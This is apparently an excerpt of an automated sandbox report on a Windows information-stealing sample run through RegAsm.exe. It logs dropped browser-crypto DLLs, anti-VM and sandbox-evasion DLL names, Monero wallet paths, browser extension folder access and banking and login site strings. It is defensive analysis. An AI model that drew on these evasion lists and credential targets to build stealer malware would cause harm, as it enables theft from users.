                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: pcacli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: version.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                          Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                          Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.3.dr
                          Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: .pdb ? source: file.exe
                          Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000003.00000002.2827920795.000000003864F000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.3.dr
                          Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000003.00000002.2821875809.000000002C764000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.3.dr
                          Source: Binary string: nss3.pdb source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr
                          Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.3.dr
                          Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp
                          Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr
                          Source: Binary string: .pdb source: 66fe13d251bbf_lsod[1].exe.3.dr, ECBKKKFHCF.exe.3.dr
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00418950
                          Source: ECBKKKFHCF.exe.3.drStatic PE information: real checksum: 0x68cd6 should be: 0x61c65
                          Source: file.exeStatic PE information: real checksum: 0x64c9d should be: 0x75c2b
                          Source: 66fe13d251bbf_lsod[1].exe.3.drStatic PE information: real checksum: 0x68cd6 should be: 0x61c65
                          Source: freebl3.dll.3.drStatic PE information: section name: .00cfg
                          Source: mozglue.dll.3.drStatic PE information: section name: .00cfg
                          Source: msvcp140.dll.3.drStatic PE information: section name: .didat
                          Source: softokn3.dll.3.drStatic PE information: section name: .00cfg
                          Source: nss3.dll.3.drStatic PE information: section name: .00cfg
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0042F142 push ecx; ret 3_2_0042F155
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00422D3B push esi; ret 3_2_00422D3D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041DDB5 push ecx; ret 3_2_0041DDC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00432715 push 0000004Ch; iretd 3_2_00432726
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C63B536 push ecx; ret 3_2_6C63B549
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0044ED93 push edx; ret 10_2_0044ED9B
                          Source: file.exeStatic PE information: section name: .text entropy: 7.996106599769484
                          Source: ECBKKKFHCF.exe.3.drStatic PE information: section name: .text entropy: 7.9954918101876205
                          Source: 66fe13d251bbf_lsod[1].exe.3.drStatic PE information: section name: .text entropy: 7.9954918101876205
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\ECBKKKFHCF.exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\66fe13d251bbf_lsod[1].exeJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                          Malware Analysis System Evasion

                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.file.exe.4195570.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.2144562432.0000000004195000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: file.exe PID: 5888, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6880, type: MEMORYSTR
                          Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                          Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                          Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                          Source: RegAsm.exe, 00000003.00000002.2801902141.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL21:49:5921:49:5921:49:5921:49:5921:49:5921:49:59DELAYS.TMP%S%SNTDLL.DLL
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 1880000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
                          Source: C:\Users\user\Desktop\file.exeMemory allocated: 5190000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: 17B0000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeMemory allocated: 5120000 memory reserve | memory write watchJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,3_2_0040180D
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 7.3 %
                          Source: C:\Users\user\Desktop\file.exe TID: 5228Thread sleep count: 308 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 6224Thread sleep count: 104 > 30Jump to behavior
                          Source: C:\Users\user\Desktop\file.exe TID: 2348Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exe TID: 6368Thread sleep count: 311 > 30Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exe TID: 6368Thread sleep count: 102 > 30Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exe TID: 3620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3516Thread sleep time: -30000s >= -30000sJump to behavior
                          Source: C:\Windows\SysWOW64\timeout.exe TID: 6224Thread sleep count: 84 > 30Jump to behavior
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh3_2_00410DDB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_0041543D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,3_2_00414CC8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00409D1C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_0040D5C6
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B5DF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,3_2_00401D80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,3_2_0040BF4D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,3_2_00415FD1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_0040B93F
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,3_2_00415B0B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,3_2_0040CD37
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,3_2_00415142
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_00410FBA GetSystemInfo,wsprintfA,3_2_00410FBA
                          Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\ProgramData\ECBKKKFHCF.exeThread delayed: delay time: 922337203685477Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                          Source: EGDGIE.3.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                          Source: EGDGIE.3.drBinary or memory string: discord.comVMware20,11696487552f
                          Source: EGDGIE.3.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                          Source: EGDGIE.3.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                          Source: RegAsm.exe, 00000003.00000002.2803671443.000000000123A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: EGDGIE.3.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: global block list test formVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: tasks.office.comVMware20,11696487552o
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
                          Source: EGDGIE.3.drBinary or memory string: AMC password management pageVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                          Source: EGDGIE.3.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: dev.azure.comVMware20,11696487552j
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                          Source: EGDGIE.3.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                          Source: EGDGIE.3.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                          Source: EGDGIE.3.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                          Source: EGDGIE.3.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                          Source: EGDGIE.3.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                          Source: EGDGIE.3.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                          Source: EGDGIE.3.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                          Source: RegAsm.exe, 00000003.00000002.2803671443.000000000123A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
